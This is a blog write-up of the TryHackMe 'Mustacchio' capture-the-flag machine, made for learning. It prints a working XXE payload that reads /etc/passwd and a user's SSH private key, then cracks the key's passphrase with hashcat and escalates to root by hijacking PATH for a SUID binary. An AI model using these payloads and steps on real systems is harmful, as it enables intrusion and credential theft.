TryHackMe - Mustacchio

Here is Strupo_'s write-up for an "Easy boot2root Machine" called Mustacchio, by zyeinn, on TryHackMe.com.


The challenge was solved by conducting some basic enumeration, exploiting an XXE injection vulnerability, cracking a password, and leveraging an SUID binary to root the system. 

Enumeration

To begin, nmap was used to determine open ports:

$ nmap -p- --open -sV -v -Pn -oA nmap-mustacchio 10.10.81.167

<snip>

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))

8765/tcp open  http    nginx 1.10.3 (Ubuntu)

<snip>

Manually browsing to the web servers revealed a mustache based blog on 80/tcp and an admin login prompt hosted on 8765/tcp as seen below:

Admin Panel Login

Next, ffuf was used to enumerate content on the web server:

$ ffuf -u http://10.10.81.167/FUZZ -w /usr/share/wordlists/dirb/big.txt

<snip>

.htaccess               [Status: 403, Size: 277, Words: 20, Lines: 10]

.htpasswd               [Status: 403, Size: 277, Words: 20, Lines: 10]

custom                  [Status: 301, Size: 313, Words: 20, Lines: 10]

fonts                   [Status: 301, Size: 312, Words: 20, Lines: 10]

images                  [Status: 301, Size: 313, Words: 20, Lines: 10]

robots.txt              [Status: 200, Size: 28, Words: 3, Lines: 3]

server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]

:: Progress: [20470/20470] :: Job [1/1] :: 319 req/sec :: Duration: [0:01:04] :: Errors: 0 ::


There was not much to review under the /custom directory and so manually browsing to the resource and checking all of the contents quickly found the users.bak file:

$ wget http://10.10.81.167/custom/js/users.bak
<snip>

$ strings users.bak
SQLite format 3
tableusersusers
CREATE TABLE users(username text NOT NULL, password text NOT NULL)
<redacted hash>

A quick google search of the hash returned the cleartext password.

Obtaining User Access

The password was successfully used against the admin portal login page where large text entry box was observed. Looking at the HTML source code also revealed the following comments of interest:

    <!-- Barry, you can now SSH in using your key!-->

and

      //document.cookie = "Example=/auth/dontforget.bak"; 

The contents of /auth/dontforget.bak can be seen below:

$ cat dontforget.bak 

<?xml version="1.0" encoding="UTF-8"?>

<comment>

  <name>Joe Hamd</name>

  <author>Barry Clad</author>

  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>

</comment>

This backup file was used as a template for an XXE injection proof-of-concept:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY strupo SYSTEM "
php://filter/read=bzip2.compress/read=convert.base64-encode/resource=/etc/passwd">]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&strupo;</com>
</comment>

This successfully rendered the base64 encoded contents of /etc/passwd. The first comment mentioned using an SSH key so it was simply a matter of changing the resource value from /etc/passwd to "/home/barry/.ssh/id_rsa."

To turn the base64 blob to an actual key, I copied the encoded text to a file and used the following command: base64 -d -w0 < b64.id_rsa > id_rsa

The key was password protected and so ssh2john was leveraged to generate a hash that could be cracked by john or hashcat:

$ python ssh2john.py id_rsa > id_rsa.hash

John failed to identify the hash. Possibly due to the "id_rsa:" prefix in the output file from ssh2john
 
Ultimately, I installed the beta version of hashcat and ran the following command to crack the hash after removing "id_rsa:" from the hash file:

$ sudo hashcat -m 22931 id_rsa.hash -a 0 --force /usr/share/wordlists/rockyou.txt

The password for the key successfully cracked and it was then a matter of using the key to connect to the box. I copied the private key to my local ~/.ssh/ directory, renamed it "barry" and used the chmod 400 barry command to set the required permissions on the file. 

$ ssh -i ~/.ssh/barry barry@10.10.81.167
<snip>
barry@mustacchio:~$ ls -ltra
total 20
-rw-r--r-- 1 barry barry 33 Jun 12 15:48 user.txt
drwxr-xr-x 2 barry barry 4096 Jun 12 15:48 .ssh
drwxr-xr-x 4 root root 4096 Jun 12 15:48 ..
drwx------ 2 barry barry 4096 Jun 13 03:10 .cache
drwxr-xr-x 4 barry barry 4096 Jun 13 03:10 .
barry@mustacchio:~$ cat user.txt
<snip>

Privilege Escalation

In order to elevate to root, I noticed an interesting looking binary in the /home/joe/ directory called "live_update." Using strings, I could see that it would simply tail -f the access.log file for the nginx web server. 

Initially, I attempted to escape special character encoding and injecting control characters into the user-agent but this was a dead-end for me. 

Next, I checked if it had the SUID bit set and it was! A quick way to spot check is ls -l and you can see the "s" in the permissions, but you can also do a system wide search by using find:

$ find / -perm -4000 2>/dev/null

I then did some searching just to make sure that there wasn't some simple way of dropping to a shell like you can with less but I didn't find anything. Then it occurred to me that if I could update my path to link tail to a binary that I specified, I should be able to root the box. 

I did this by performing the following steps:

barry@mustacchio:~$ mkdir bin && cd bin

barry@mustacchio:~/bin$ export PATH=$HOME/bin:$PATH

barry@mustacchio:~/bin$ nano foo

barry@mustacchio:~/bin# cat foo 

#!/bin/bash

/bin/bash

barry@mustacchio:~/bin$ chmod +x foo

barry@mustacchio:~/bin$ ln -s foo tail

barry@mustacchio:~/bin$ ../../joe/./live_log

root@mustacchio:~# cd /root

root@mustacchio:/root# ls -l

total 4

-rw------- 1 root root 33 Jun 12 15:48 root.txt

root@mustacchio:/root# cat root.txt 

<snip>

Conclusion

This was my first challenge hosted on TryHackMe.com and I really enjoyed it and the service. Signing-up was pain free and it was easy to just jump right into the challenge.

Thanks for reading!

@strupo_

Find us on twitter: @teamWTG

Popular posts from this blog

The Audacity of Some CTFs

2020 HTH CTF - Cloud Challenges

HTB Business CTF 2021 - Theta